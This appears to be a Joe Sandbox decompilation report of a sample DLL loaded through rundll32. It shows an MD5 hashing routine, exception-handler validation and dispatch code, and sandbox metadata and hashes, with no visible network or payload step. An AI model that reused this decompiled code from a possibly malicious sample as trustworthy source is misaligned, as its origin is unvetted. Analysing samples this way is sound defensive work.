                                      				signed int _t363;
                                      				signed int _t365;
                                      				signed int _t367;
                                      				signed int _t376;
                                      				signed int _t378;
                                      				signed int _t380;
                                      				signed int _t382;
                                      				signed int _t384;
                                      				intOrPtr* _t400;
                                      				signed int* _t401;
                                      				signed int _t402;
                                      				signed int _t404;
                                      				signed int _t406;
                                      				signed int _t408;
                                      				signed int _t410;
                                      				signed int _t412;
                                      				signed int _t414;
                                      				signed int _t416;
                                      				signed int _t418;
                                      				signed int _t420;
                                      				signed int _t422;
                                      				signed int _t424;
                                      				signed int _t432;
                                      				signed int _t434;
                                      				signed int _t436;
                                      				signed int _t438;
                                      				signed int _t440;
                                      				signed int _t508;
                                      				signed int _t599;
                                      				signed int _t607;
                                      				signed int _t613;
                                      				signed int _t679;
                                      				void* _t682;
                                      				signed int _t683;
                                      				signed int _t685;
                                      				signed int _t690;
                                      				signed int _t692;
                                      				signed int _t697;
                                      				signed int _t699;
                                      				signed int _t718;
                                      				signed int _t720;
                                      				signed int _t722;
                                      				signed int _t724;
                                      				signed int _t726;
                                      				signed int _t728;
                                      				signed int _t734;
                                      				signed int _t740;
                                      				signed int _t742;
                                      				signed int _t744;
                                      				signed int _t746;
                                      				signed int _t748;
                                      
                                      				_t226 = _a4;
                                      				_t348 = __ecx + 2;
                                      				_t401 =  &_v76;
                                      				_t682 = 0x10;
                                      				do {
                                      					 *_t401 = (((_t348[1] & 0x000000ff) << 0x00000008 |  *_t348 & 0x000000ff) << 0x00000008 |  *(_t348 - 1) & 0x000000ff) << 0x00000008 |  *(_t348 - 2) & 0x000000ff;
                                      					_t401 =  &(_t401[1]);
                                      					_t348 =  &(_t348[4]);
                                      					_t682 = _t682 - 1;
                                      				} while (_t682 != 0);
                                      				_t6 = _t226 + 4; // 0x14eb3fc3
                                      				_t683 =  *_t6;
                                      				_t7 = _t226 + 8; // 0x8d08458b
                                      				_t402 =  *_t7;
                                      				_t8 = _t226 + 0xc; // 0x56c1184c
                                      				_t349 =  *_t8;
                                      				asm("rol eax, 0x7");
                                      				_t229 = ( !_t683 & _t349 | _t402 & _t683) + _v76 +  *_t226 - 0x28955b88 + _t683;
                                      				asm("rol ecx, 0xc");
                                      				_t351 = ( !_t229 & _t402 | _t683 & _t229) + _v72 + _t349 - 0x173848aa + _t229;
                                      				asm("ror edx, 0xf");
                                      				_t404 = ( !_t351 & _t683 | _t351 & _t229) + _v68 + _t402 + 0x242070db + _t351;
                                      				asm("ror esi, 0xa");
                                      				_t685 = ( !_t404 & _t229 | _t351 & _t404) + _v64 + _t683 - 0x3e423112 + _t404;
                                      				_v8 = _t685;
                                      				_t690 = _v8;
                                      				asm("rol eax, 0x7");
                                      				_t231 = ( !_t685 & _t351 | _t404 & _v8) + _v60 + _t229 - 0xa83f051 + _t690;
                                      				asm("rol ecx, 0xc");
                                      				_t353 = ( !_t231 & _t404 | _t690 & _t231) + _v56 + _t351 + 0x4787c62a + _t231;
                                      				asm("ror edx, 0xf");
                                      				_t406 = ( !_t353 & _t690 | _t353 & _t231) + _v52 + _t404 - 0x57cfb9ed + _t353;
                                      				asm("ror esi, 0xa");
                                      				_t692 = ( !_t406 & _t231 | _t353 & _t406) + _v48 + _t690 - 0x2b96aff + _t406;
                                      				_v8 = _t692;
                                      				_t697 = _v8;
                                      				asm("rol eax, 0x7");
                                      				_t233 = ( !_t692 & _t353 | _t406 & _v8) + _v44 + _t231 + 0x698098d8 + _t697;
                                      				asm("rol ecx, 0xc");
                                      				_t355 = ( !_t233 & _t406 | _t697 & _t233) + _v40 + _t353 - 0x74bb0851 + _t233;
                                      				asm("ror edx, 0xf");
                                      				_t408 = ( !_t355 & _t697 | _t355 & _t233) + _v36 + _t406 - 0xa44f + _t355;
                                      				asm("ror esi, 0xa");
                                      				_t699 = ( !_t408 & _t233 | _t355 & _t408) + _v32 + _t697 - 0x76a32842 + _t408;
                                      				_v8 = _t699;
                                      				asm("rol eax, 0x7");
                                      				_t235 = ( !_t699 & _t355 | _t408 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
                                      				asm("rol ecx, 0xc");
                                      				_t357 = ( !_t235 & _t408 | _v8 & _t235) + _v24 + _t355 - 0x2678e6d + _t235;
                                      				_t508 =  !_t357;
                                      				asm("ror edx, 0xf");
                                      				_t410 = (_t508 & _v8 | _t357 & _t235) + _v20 + _t408 - 0x5986bc72 + _t357;
                                      				_v12 = _t410;
                                      				_v12 =  !_v12;
                                      				asm("ror esi, 0xa");
                                      				_t718 = (_v12 & _t235 | _t357 & _t410) + _v16 + _v8 + 0x49b40821 + _t410;
                                      				asm("rol eax, 0x5");
                                      				_t237 = (_t508 & _t410 | _t357 & _t718) + _v72 + _t235 - 0x9e1da9e + _t718;
                                      				asm("rol ecx, 0x9");
                                      				_t359 = (_v12 & _t718 | _t410 & _t237) + _v52 + _t357 - 0x3fbf4cc0 + _t237;
                                      				asm("rol edx, 0xe");
                                      				_t412 = ( !_t718 & _t237 | _t359 & _t718) + _v32 + _t410 + 0x265e5a51 + _t359;
                                      				asm("ror esi, 0xc");
                                      				_t720 = ( !_t237 & _t359 | _t412 & _t237) + _v76 + _t718 - 0x16493856 + _t412;
                                      				asm("rol eax, 0x5");
                                      				_t239 = ( !_t359 & _t412 | _t359 & _t720) + _v56 + _t237 - 0x29d0efa3 + _t720;
                                      				asm("rol ecx, 0x9");
                                      				_t361 = ( !_t412 & _t720 | _t412 & _t239) + _v36 + _t359 + 0x2441453 + _t239;
                                      				asm("rol edx, 0xe");
                                      				_t414 = ( !_t720 & _t239 | _t361 & _t720) + _v16 + _t412 - 0x275e197f + _t361;
                                      				asm("ror esi, 0xc");
                                      				_t722 = ( !_t239 & _t361 | _t414 & _t239) + _v60 + _t720 - 0x182c0438 + _t414;
                                      				asm("rol eax, 0x5");
                                      				_t241 = ( !_t361 & _t414 | _t361 & _t722) + _v40 + _t239 + 0x21e1cde6 + _t722;
                                      				asm("rol ecx, 0x9");
                                      				_t363 = ( !_t414 & _t722 | _t414 & _t241) + _v20 + _t361 - 0x3cc8f82a + _t241;
                                      				asm("rol edx, 0xe");
                                      				_t416 = ( !_t722 & _t241 | _t363 & _t722) + _v64 + _t414 - 0xb2af279 + _t363;
                                      				asm("ror esi, 0xc");
                                      				_t724 = ( !_t241 & _t363 | _t416 & _t241) + _v44 + _t722 + 0x455a14ed + _t416;
                                      				asm("rol eax, 0x5");
                                      				_t243 = ( !_t363 & _t416 | _t363 & _t724) + _v24 + _t241 - 0x561c16fb + _t724;
                                      				asm("rol ecx, 0x9");
                                      				_t365 = ( !_t416 & _t724 | _t416 & _t243) + _v68 + _t363 - 0x3105c08 + _t243;
                                      				asm("rol edx, 0xe");
                                      				_t418 = ( !_t724 & _t243 | _t365 & _t724) + _v48 + _t416 + 0x676f02d9 + _t365;
                                      				asm("ror esi, 0xc");
                                      				_t726 = ( !_t243 & _t365 | _t418 & _t243) + _v28 + _t724 - 0x72d5b376 + _t418;
                                      				asm("rol eax, 0x4");
                                      				_t245 = (_t365 ^ _t418 ^ _t726) + _v56 + _t243 - 0x5c6be + _t726;
                                      				asm("rol ecx, 0xb");
                                      				_t367 = (_t418 ^ _t726 ^ _t245) + _v44 + _t365 - 0x788e097f + _t245;
                                      				asm("rol edx, 0x10");
                                      				_t420 = (_t367 ^ _t726 ^ _t245) + _v32 + _t418 + 0x6d9d6122 + _t367;
                                      				_t599 = _t367 ^ _t420;
                                      				asm("ror esi, 0x9");
                                      				_t728 = (_t599 ^ _t245) + _v20 + _t726 - 0x21ac7f4 + _t420;
                                      				asm("rol eax, 0x4");
                                      				_t247 = (_t599 ^ _t728) + _v72 + _t245 - 0x5b4115bc + _t728;
                                      				asm("rol edi, 0xb");
                                      				_t607 = (_t420 ^ _t728 ^ _t247) + _v60 + _t367 + 0x4bdecfa9 + _t247;
                                      				asm("rol edx, 0x10");
                                      				_t422 = (_t607 ^ _t728 ^ _t247) + _v48 + _t420 - 0x944b4a0 + _t607;
                                      				_t338 = _t607 ^ _t422;
                                      				asm("ror ecx, 0x9");
                                      				_t376 = (_t338 ^ _t247) + _v36 + _t728 - 0x41404390 + _t422;
                                      				asm("rol eax, 0x4");
                                      				_t249 = (_t338 ^ _t376) + _v24 + _t247 + 0x289b7ec6 + _t376;
                                      				asm("rol esi, 0xb");
                                      				_t734 = (_t422 ^ _t376 ^ _t249) + _v76 + _t607 - 0x155ed806 + _t249;
                                      				asm("rol edi, 0x10");
                                      				_t613 = (_t734 ^ _t376 ^ _t249) + _v64 + _t422 - 0x2b10cf7b + _t734;
                                      				_t424 = _t734 ^ _t613;
                                      				asm("ror ecx, 0x9");
                                      				_t378 = (_t424 ^ _t249) + _v52 + _t376 + 0x4881d05 + _t613;
                                      				asm("rol eax, 0x4");
                                      				_t251 = (_t424 ^ _t378) + _v40 + _t249 - 0x262b2fc7 + _t378;
                                      				asm("rol edx, 0xb");
                                      				_t432 = (_t613 ^ _t378 ^ _t251) + _v28 + _t734 - 0x1924661b + _t251;
                                      				asm("rol esi, 0x10");
                                      				_t740 = (_t432 ^ _t378 ^ _t251) + _v16 + _t613 + 0x1fa27cf8 + _t432;
                                      				asm("ror ecx, 0x9");
                                      				_t380 = (_t432 ^ _t740 ^ _t251) + _v68 + _t378 - 0x3b53a99b + _t740;
                                      				asm("rol eax, 0x6");
                                      				_t253 = (( !_t432 | _t380) ^ _t740) + _v76 + _t251 - 0xbd6ddbc + _t380;
                                      				asm("rol edx, 0xa");
                                      				_t434 = (( !_t740 | _t253) ^ _t380) + _v48 + _t432 + 0x432aff97 + _t253;
                                      				asm("rol esi, 0xf");
                                      				_t742 = (( !_t380 | _t434) ^ _t253) + _v20 + _t740 - 0x546bdc59 + _t434;
                                      				asm("ror ecx, 0xb");
                                      				_t382 = (( !_t253 | _t742) ^ _t434) + _v56 + _t380 - 0x36c5fc7 + _t742;
                                      				asm("rol eax, 0x6");
                                      				_t255 = (( !_t434 | _t382) ^ _t742) + _v28 + _t253 + 0x655b59c3 + _t382;
                                      				asm("rol edx, 0xa");
                                      				_t436 = (( !_t742 | _t255) ^ _t382) + _v64 + _t434 - 0x70f3336e + _t255;
                                      				asm("rol esi, 0xf");
                                      				_t744 = (( !_t382 | _t436) ^ _t255) + _v36 + _t742 - 0x100b83 + _t436;
                                      				asm("ror ecx, 0xb");
                                      				_t384 = (( !_t255 | _t744) ^ _t436) + _v72 + _t382 - 0x7a7ba22f + _t744;
                                      				asm("rol eax, 0x6");
                                      				_t257 = (( !_t436 | _t384) ^ _t744) + _v44 + _t255 + 0x6fa87e4f + _t384;
                                      				asm("rol edx, 0xa");
                                      				_t438 = (( !_t744 | _t257) ^ _t384) + _v16 + _t436 - 0x1d31920 + _t257;
                                      				asm("rol esi, 0xf");
                                      				_t746 = (( !_t384 | _t438) ^ _t257) + _v52 + _t744 - 0x5cfebcec + _t438;
                                      				asm("ror edi, 0xb");
                                      				_t679 = (( !_t257 | _t746) ^ _t438) + _v24 + _t384 + 0x4e0811a1 + _t746;
                                      				asm("rol eax, 0x6");
                                      				_t259 = (( !_t438 | _t679) ^ _t746) + _v60 + _t257 - 0x8ac817e + _t679;
                                      				asm("rol edx, 0xa");
                                      				_t440 = (( !_t746 | _t259) ^ _t679) + _v32 + _t438 - 0x42c50dcb + _t259;
                                      				_t400 = _a4;
                                      				asm("rol esi, 0xf");
                                      				_t748 = (( !_t679 | _t440) ^ _t259) + _v68 + _t746 + 0x2ad7d2bb + _t440;
                                      				 *_t400 =  *_t400 + _t259;
                                      				asm("ror eax, 0xb");
                                      				 *((intOrPtr*)(_t400 + 4)) = (( !_t259 | _t748) ^ _t440) + _v40 + _t679 - 0x14792c6f +  *((intOrPtr*)(_t400 + 4)) + _t748;
                                      				 *((intOrPtr*)(_t400 + 8)) =  *((intOrPtr*)(_t400 + 8)) + _t748;
                                      				 *((intOrPtr*)(_t400 + 0xc)) =  *((intOrPtr*)(_t400 + 0xc)) + _t440;
                                      				return memset( &_v76, 0, 0x40);
                                      			}

                                      0x04de1be3
                                      0x04de1be6
                                      0x04de1c00
                                      0x04de1c03
                                      0x04de1c1b
                                      0x04de1c1e
                                      0x04de1c34
                                      0x04de1c37
                                      0x04de1c4f
                                      0x04de1c52
                                      0x04de1c6a
                                      0x04de1c6d
                                      0x04de1c87
                                      0x04de1c8a
                                      0x04de1ca0
                                      0x04de1ca3
                                      0x04de1cbb
                                      0x04de1cbe
                                      0x04de1cd8
                                      0x04de1cdb
                                      0x04de1cf3
                                      0x04de1cf6
                                      0x04de1d0c
                                      0x04de1d0f
                                      0x04de1d27
                                      0x04de1d2a
                                      0x04de1d42
                                      0x04de1d45
                                      0x04de1d57
                                      0x04de1d5a
                                      0x04de1d6c
                                      0x04de1d6f
                                      0x04de1d81
                                      0x04de1d84
                                      0x04de1d88
                                      0x04de1d98
                                      0x04de1d9b
                                      0x04de1da9
                                      0x04de1dac
                                      0x04de1dbe
                                      0x04de1dc1
                                      0x04de1dd5
                                      0x04de1dd8
                                      0x04de1dda
                                      0x04de1dea
                                      0x04de1ded
                                      0x04de1dff
                                      0x04de1e02
                                      0x04de1e10
                                      0x04de1e13
                                      0x04de1e25
                                      0x04de1e28
                                      0x04de1e2c
                                      0x04de1e3c
                                      0x04de1e3f
                                      0x04de1e51
                                      0x04de1e54
                                      0x04de1e62
                                      0x04de1e65
                                      0x04de1e77
                                      0x04de1e7a
                                      0x04de1e8c
                                      0x04de1e8f
                                      0x04de1ea3
                                      0x04de1ea6
                                      0x04de1eba
                                      0x04de1ebd
                                      0x04de1ed1
                                      0x04de1ed4
                                      0x04de1ee8
                                      0x04de1eeb
                                      0x04de1eff
                                      0x04de1f02
                                      0x04de1f16
                                      0x04de1f1b
                                      0x04de1f2d
                                      0x04de1f30
                                      0x04de1f44
                                      0x04de1f47
                                      0x04de1f5b
                                      0x04de1f5e
                                      0x04de1f74
                                      0x04de1f77
                                      0x04de1f8b
                                      0x04de1f8e
                                      0x04de1fa0
                                      0x04de1fa3
                                      0x04de1fb7
                                      0x04de1fba
                                      0x04de1fce
                                      0x04de1fd1
                                      0x04de1fe5
                                      0x04de1fee
                                      0x04de1ff1
                                      0x04de1ffa
                                      0x04de2003
                                      0x04de200b
                                      0x04de2013
                                      0x04de201d
                                      0x04de2032

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
• Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: memset
                                      • String ID:
                                      • API String ID: 2221118986-0
                                      • Opcode ID: 668d1cf50dd3503a056f93744feca511f7f68e9204d6a8be59307995ef794564
                                      • Instruction ID: b188ac7a3da38aa4b446578b9e7ce6689be36518c61c3911b2778b483d50ebf1
                                      • Opcode Fuzzy Hash: 668d1cf50dd3503a056f93744feca511f7f68e9204d6a8be59307995ef794564
                                      • Instruction Fuzzy Hash: CD22847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E04DE8441(long _a4) {
                                      				intOrPtr _v8;
                                      				intOrPtr _v12;
                                      				signed int _v16;
                                      				short* _v32;
                                      				void _v36;
                                      				void* _t57;
                                      				signed int _t58;
                                      				signed int _t61;
                                      				signed int _t62;
                                      				void* _t63;
                                      				signed int* _t68;
                                      				intOrPtr* _t69;
                                      				intOrPtr* _t71;
                                      				intOrPtr _t72;
                                      				intOrPtr _t75;
                                      				void* _t76;
                                      				signed int _t77;
                                      				void* _t78;
                                      				void _t80;
                                      				signed int _t81;
                                      				signed int _t84;
                                      				signed int _t86;
                                      				short* _t87;
                                      				void* _t89;
                                      				signed int* _t90;
                                      				long _t91;
                                      				signed int _t93;
                                      				signed int _t94;
                                      				signed int _t100;
                                      				signed int _t102;
                                      				void* _t104;
                                      				long _t108;
                                      				signed int _t110;
                                      
                                      				_t108 = _a4;
                                      				_t76 =  *(_t108 + 8);
                                      				if((_t76 & 0x00000003) != 0) {
                                      					L3:
                                      					return 0;
                                      				}
                                      				_a4 =  *[fs:0x4];
                                      				_v8 =  *[fs:0x8];
                                      				if(_t76 < _v8 || _t76 >= _a4) {
                                      					_t102 =  *(_t108 + 0xc);
                                      					__eflags = _t102 - 0xffffffff;
                                      					if(_t102 != 0xffffffff) {
                                      						_t91 = 0;
                                      						__eflags = 0;
                                      						_a4 = 0;
                                      						_t57 = _t76;
                                      						do {
                                      							_t80 =  *_t57;
                                      							__eflags = _t80 - 0xffffffff;
                                      							if(_t80 == 0xffffffff) {
                                      								goto L9;
                                      							}
                                      							__eflags = _t80 - _t91;
                                      							if(_t80 >= _t91) {
                                      								L20:
                                      								_t63 = 0;
                                      								L60:
                                      								return _t63;
                                      							}
                                      							L9:
                                      							__eflags =  *(_t57 + 4);
                                      							if( *(_t57 + 4) != 0) {
                                      								_t12 =  &_a4;
                                      								 *_t12 = _a4 + 1;
                                      								__eflags =  *_t12;
                                      							}
                                      							_t91 = _t91 + 1;
                                      							_t57 = _t57 + 0xc;
                                      							__eflags = _t91 - _t102;
                                      						} while (_t91 <= _t102);
                                      						__eflags = _a4;
                                      						if(_a4 == 0) {
                                      							L15:
                                      							_t81 =  *0x4dea380; // 0x0
                                      							_t110 = _t76 & 0xfffff000;
                                      							_t58 = 0;
                                      							__eflags = _t81;
                                      							if(_t81 <= 0) {
                                      								L18:
                                      								_t104 = _t102 | 0xffffffff;
                                      								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                                      								__eflags = _t61;
                                      								if(_t61 < 0) {
                                      									_t62 = 0;
                                      									__eflags = 0;
                                      								} else {
                                      									_t62 = _a4;
                                      								}
                                      								__eflags = _t62;
                                      								if(_t62 == 0) {
                                      									L59:
                                      									_t63 = _t104;
                                      									goto L60;
                                      								} else {
                                      									__eflags = _v12 - 0x1000000;
                                      									if(_v12 != 0x1000000) {
                                      										goto L59;
                                      									}
                                      									__eflags = _v16 & 0x000000cc;
                                      									if((_v16 & 0x000000cc) == 0) {
                                      										L46:
                                      										_t63 = 1;
                                      										 *0x4dea3c8 = 1;
                                      										__eflags =  *0x4dea3c8;
                                      										if( *0x4dea3c8 != 0) {
                                      											goto L60;
                                      										}
                                      										_t84 =  *0x4dea380; // 0x0
                                      										__eflags = _t84;
                                      										_t93 = _t84;
                                      										if(_t84 <= 0) {
                                      											L51:
                                      											__eflags = _t93;
                                      											if(_t93 != 0) {
                                      												L58:
                                      												 *0x4dea3c8 = 0;
                                      												goto L5;
                                      											}
                                      											_t77 = 0xf;
                                      											__eflags = _t84 - _t77;
                                      											if(_t84 <= _t77) {
                                      												_t77 = _t84;
                                      											}
                                      											_t94 = 0;
                                      											__eflags = _t77;
                                      											if(_t77 < 0) {
                                      												L56:
                                      												__eflags = _t84 - 0x10;
                                      												if(_t84 < 0x10) {
                                      													_t86 = _t84 + 1;
                                      													__eflags = _t86;
                                      													 *0x4dea380 = _t86;
                                      												}
                                      												goto L58;
                                      											} else {
                                      												do {
                                      													_t68 = 0x4dea388 + _t94 * 4;
                                      													_t94 = _t94 + 1;
                                      													__eflags = _t94 - _t77;
                                      													 *_t68 = _t110;
                                      													_t110 =  *_t68;
                                      												} while (_t94 <= _t77);
                                      												goto L56;
                                      											}
                                      										}
                                      										_t69 = 0x4dea384 + _t84 * 4;
                                      										while(1) {
                                      											__eflags =  *_t69 - _t110;
                                      											if( *_t69 == _t110) {
                                      												goto L51;
                                      											}
                                      											_t93 = _t93 - 1;
                                      											_t69 = _t69 - 4;
                                      											__eflags = _t93;
                                      											if(_t93 > 0) {
                                      												continue;
                                      											}
                                      											goto L51;
                                      										}
                                      										goto L51;
                                      									}
                                      									_t87 = _v32;
                                      									__eflags =  *_t87 - 0x5a4d;
                                      									if( *_t87 != 0x5a4d) {
                                      										goto L59;
                                      									}
                                      									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                                      									__eflags =  *_t71 - 0x4550;
                                      									if( *_t71 != 0x4550) {
                                      										goto L59;
                                      									}
                                      									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                                      									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                                      										goto L59;
                                      									}
                                      									_t78 = _t76 - _t87;
                                      									__eflags =  *((short*)(_t71 + 6));
                                      									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                                      									if( *((short*)(_t71 + 6)) <= 0) {
                                      										goto L59;
                                      									}
                                      									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                                      									__eflags = _t78 - _t72;
                                      									if(_t78 < _t72) {
                                      										goto L46;
                                      									}
                                      									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                                      									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                                      										goto L46;
                                      									}
                                      									__eflags =  *(_t89 + 0x27) & 0x00000080;
                                      									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                                      										goto L20;
                                      									}
                                      									goto L46;
                                      								}
                                      							} else {
                                      								goto L16;
                                      							}
                                      							while(1) {
                                      								L16:
                                      								__eflags =  *((intOrPtr*)(0x4dea388 + _t58 * 4)) - _t110;
                                      								if( *((intOrPtr*)(0x4dea388 + _t58 * 4)) == _t110) {
                                      									break;
                                      								}
                                      								_t58 = _t58 + 1;
                                      								__eflags = _t58 - _t81;
                                      								if(_t58 < _t81) {
                                      									continue;
                                      								}
                                      								goto L18;
                                      							}
                                      							__eflags = _t58;
                                      							if(_t58 <= 0) {
                                      								goto L5;
                                      							}
                                      							 *0x4dea3c8 = 1;
                                      							__eflags =  *0x4dea3c8;
                                      							if( *0x4dea3c8 != 0) {
                                      								goto L5;
                                      							}
                                      							__eflags =  *((intOrPtr*)(0x4dea388 + _t58 * 4)) - _t110;
                                      							if( *((intOrPtr*)(0x4dea388 + _t58 * 4)) == _t110) {
                                      								L32:
                                      								_t100 = 0;
                                      								__eflags = _t58;
                                      								if(_t58 < 0) {
                                      									L34:
                                      									 *0x4dea3c8 = 0;
                                      									goto L5;
                                      								} else {
                                      									goto L33;
                                      								}
                                      								do {
                                      									L33:
                                      									_t90 = 0x4dea388 + _t100 * 4;
                                      									_t100 = _t100 + 1;
                                      									__eflags = _t100 - _t58;
                                      									 *_t90 = _t110;
                                      									_t110 =  *_t90;
                                      								} while (_t100 <= _t58);
                                      								goto L34;
                                      							}
                                      							_t25 = _t81 - 1; // -1
                                      							_t58 = _t25;
                                      							__eflags = _t58;
                                      							if(_t58 < 0) {
                                      								L28:
                                      								__eflags = _t81 - 0x10;
                                      								if(_t81 < 0x10) {
                                      									_t81 = _t81 + 1;
                                      									__eflags = _t81;
                                      									 *0x4dea380 = _t81;
                                      								}
                                      								_t28 = _t81 - 1; // 0x0
                                      								_t58 = _t28;
                                      								goto L32;
                                      							} else {
                                      								goto L25;
                                      							}
                                      							while(1) {
                                      								L25:
                                      								__eflags =  *((intOrPtr*)(0x4dea388 + _t58 * 4)) - _t110;
                                      								if( *((intOrPtr*)(0x4dea388 + _t58 * 4)) == _t110) {
                                      									break;
                                      								}
                                      								_t58 = _t58 - 1;
                                      								__eflags = _t58;
                                      								if(_t58 >= 0) {
                                      									continue;
                                      								}
                                      								break;
                                      							}
                                      							__eflags = _t58;
                                      							if(__eflags >= 0) {
                                      								if(__eflags == 0) {
                                      									goto L34;
                                      								}
                                      								goto L32;
                                      							}
                                      							goto L28;
                                      						}
                                      						_t75 =  *((intOrPtr*)(_t108 - 8));
                                      						__eflags = _t75 - _v8;
                                      						if(_t75 < _v8) {
                                      							goto L20;
                                      						}
                                      						__eflags = _t75 - _t108;
                                      						if(_t75 >= _t108) {
                                      							goto L20;
                                      						}
                                      						goto L15;
                                      					}
                                      					L5:
                                      					_t63 = 1;
                                      					goto L60;
                                      				} else {
                                      					goto L3;
                                      				}
                                      			}

                                      0x04de844b
                                      0x04de844e
                                      0x04de8454
                                      0x04de8472
                                      0x00000000
                                      0x04de8472
                                      0x04de845c
                                      0x04de8465
                                      0x04de846b
                                      0x04de847a
                                      0x04de847d
                                      0x04de8480
                                      0x04de848a
                                      0x04de848a
                                      0x04de848c
                                      0x04de848f
                                      0x04de8491
                                      0x04de8491
                                      0x04de8493
                                      0x04de8496
                                      0x00000000
                                      0x00000000
                                      0x04de8498
                                      0x04de849a
                                      0x04de8500
                                      0x04de8500
                                      0x04de865e
                                      0x00000000
                                      0x04de865e
                                      0x04de849c
                                      0x04de849c
                                      0x04de84a0
                                      0x04de84a2
                                      0x04de84a2
                                      0x04de84a2
                                      0x04de84a2
                                      0x04de84a5
                                      0x04de84a6
                                      0x04de84a9
                                      0x04de84a9
                                      0x04de84ad
                                      0x04de84b1
                                      0x04de84bf
                                      0x04de84bf
                                      0x04de84c7
                                      0x04de84cd
                                      0x04de84cf
                                      0x04de84d1
                                      0x04de84e1
                                      0x04de84ee
                                      [Per-line address column for the preceding decompiled function: 0x04de8482 .. 0x04de865c, 0x00000000 where a line has no code]

                                      APIs
                                      • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 04DE84F2
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: MemoryQueryVirtual
                                      • String ID:
                                      • API String ID: 2850889275-0
                                      • Opcode ID: ccc76899bf0da1422e0e1fa5750a46eae4db21750d98761c742c0a4351bd1fbe
                                      • Instruction ID: bf6731b11c8b4763a1bef1eceb0400982026ac3efff4e7fbaaa4a8445c05dd9f
                                      • Opcode Fuzzy Hash: ccc76899bf0da1422e0e1fa5750a46eae4db21750d98761c742c0a4351bd1fbe
                                      • Instruction Fuzzy Hash: 9961B030B00612DFDB29FF6BC89467973A2FB85354B24886DF846CB294EB35F941A750
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 71%
                                      			E04DE821C(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                                      				intOrPtr _v8;
                                      				char _v12;
                                      				void* __ebp;
                                      				signed int* _t43;
                                      				char _t44;
                                      				void* _t46;
                                      				void* _t49;
                                      				intOrPtr* _t53;
                                      				void* _t54;
                                      				void* _t65;
                                      				long _t66;
                                      				signed int* _t80;
                                      				signed int* _t82;
                                      				void* _t84;
                                      				signed int _t86;
                                      				void* _t89;
                                      				void* _t95;
                                      				void* _t96;
                                      				void* _t99;
                                      				void* _t106;
                                      
                                      				_t43 = _t84;
                                      				_t65 = __ebx + 2;
                                      				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                                      				_t89 = _t95;
                                      				_t96 = _t95 - 8;
                                      				_push(_t65);
                                      				_push(_t84);
                                      				_push(_t89);
                                      				asm("cld");
                                      				_t66 = _a8;
                                      				_t44 = _a4;
                                      				if(( *(_t44 + 4) & 0x00000006) != 0) {
                                      					_push(_t89);
                                      					E04DE8387(_t66 + 0x10, _t66, 0xffffffff);
                                      					_t46 = 1;
                                      				} else {
                                      					_v12 = _t44;
                                      					_v8 = _a12;
                                      					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                                      					_t86 =  *(_t66 + 0xc);
                                      					_t80 =  *(_t66 + 8);
                                      					_t49 = E04DE8441(_t66);
                                      					_t99 = _t96 + 4;
                                      					if(_t49 == 0) {
                                      						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                      						goto L11;
                                      					} else {
                                      						while(_t86 != 0xffffffff) {
                                      							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                                      							if(_t53 == 0) {
                                      								L8:
                                      								_t80 =  *(_t66 + 8);
                                      								_t86 = _t80[_t86 + _t86 * 2];
                                      								continue;
                                      							} else {
                                      								_t54 =  *_t53();
                                      								_t89 = _t89;
                                      								_t86 = _t86;
                                      								_t66 = _a8;
                                      								_t55 = _t54;
                                      								_t106 = _t54;
                                      								if(_t106 == 0) {
                                      									goto L8;
                                      								} else {
                                      									if(_t106 < 0) {
                                      										_t46 = 0;
                                      									} else {
                                      										_t82 =  *(_t66 + 8);
                                      										E04DE832C(_t55, _t66);
                                      										_t89 = _t66 + 0x10;
                                      										E04DE8387(_t89, _t66, 0);
                                      										_t99 = _t99 + 0xc;
                                      										E04DE8423(_t82[2]);
                                      										 *(_t66 + 0xc) =  *_t82;
                                      										_t66 = 0;
                                      										_t86 = 0;
                                      										 *(_t82[2])(1);
                                      										goto L8;
                                      									}
                                      								}
                                      							}
                                      							goto L13;
                                      						}
                                      						L11:
                                      						_t46 = 1;
                                      					}
                                      				}
                                      				L13:
                                      				return _t46;
                                      			}

